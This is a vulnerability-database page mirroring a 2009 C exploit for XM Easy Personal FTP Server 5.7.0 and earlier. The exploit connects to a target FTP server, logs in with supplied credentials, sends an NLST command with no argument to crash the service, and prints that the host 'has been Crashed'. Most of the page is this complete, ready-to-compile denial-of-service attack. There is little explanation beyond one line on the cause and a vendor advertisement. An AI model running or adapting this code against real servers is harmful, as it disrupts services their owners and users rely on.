Lucene search

XM Easy Personal FTP Server DoS

🗓️ 27 Mar 2009 00:00:00Reported by Jonathan SalwanType

packetstorm🔗 packetstormsecurity.com👁 17 Views

XM Easy Personal FTP Server <= 5.7.0 Remote Denial of Service with Request (NLST) caused by error in handling the NLST command can crash the FTP service by sending NULL argument

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`/*  
XM Easy Personnal FTP Server <= 5.7.0  
Remote Denial of Service with Request (NLST)  
  
---------------------------------------------------------------------------------------------------------  
The vulnerability is caused due to an error in handling the NLST command. This can be exploited to crash   
the FTP service by sending the "NLST" with NULL argument.  
---------------------------------------------------------------------------------------------------------  
  
Author: Jonathan Salwan  
Mail : submit [AT] shell-storm.org  
Web : http://www.shell-storm.org  
*/  
  
#include "stdio.h"  
#include "unistd.h"  
#include "stdlib.h"  
#include "sys/types.h"  
#include "sys/socket.h"  
#include "netinet/in.h"  
  
int syntax(char *file)  
{  
fprintf(stderr,"XM Easy Personnal FTP Server <= 5.7.0\n");  
fprintf(stderr,"=>Syntax : <%s> <ip> <port> <login> <passwd>\n",file);  
fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1\n",file);   
exit(0);  
}  
  
int main(int argc, char **argv)  
{  
if (argc < 4)  
syntax(argv[0]);  
  
int port = atoi(argv[2]);  
  
int mysocket;  
int mysocket2;  
int srv_connect;  
int sockaddr_long;  
  
  
struct sockaddr_in sockaddr_mysocket;  
sockaddr_long = sizeof(sockaddr_mysocket);  
sockaddr_mysocket.sin_family = AF_INET;  
sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);  
sockaddr_mysocket.sin_port = htons(port);  
  
char request[50];  
char answer[200];  
  
fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);  
  
mysocket2 = socket(AF_INET, SOCK_STREAM, 0);  
if(mysocket2 == -1){  
fprintf(stderr,"[-]FAILED SOCKET\n");  
return 1;}  
  
srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);  
  
if (srv_connect != -1)  
{   
  
memset(answer,0,200);  
recv(mysocket2,answer,sizeof(answer),0);  
  
sprintf(request, "USER %s\r\n", argv[3]);   
if (send(mysocket2,request,strlen(request),0) == -1){  
fprintf(stderr,"[-]Send Request USER\t\t[FAILED]\n");  
shutdown(mysocket2,1);  
return 1;}  
else{  
memset(answer,0,200);  
recv(mysocket2,answer,sizeof(answer),0);  
}  
  
sprintf(request, "PASS %s\r\n", argv[4]);  
if (send(mysocket2,request,strlen(request),0) == -1){  
fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");  
shutdown(mysocket2,1);  
return 1;}  
else{   
memset(answer,0,200);  
recv(mysocket2,answer,sizeof(answer),0);  
}  
sprintf(request, "NLST\r\n");  
if (send(mysocket2,request,strlen(request),0) == -1){  
fprintf(stderr,"[-]Send Request NLST\t\t[FAILED]\n");  
shutdown(mysocket2,1);  
return 1;}  
  
}  
else{  
fprintf(stderr,"[-]Connect\t\t[FAILED]\n");  
shutdown(mysocket2,1);  
return 1;}  
  
  
shutdown(mysocket2,1);  
  
  
fprintf(stdout,"[+]Done! %s has been Crashed\n", argv[1]);  
return 0;  
}  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

27 Mar 2009 00:00Current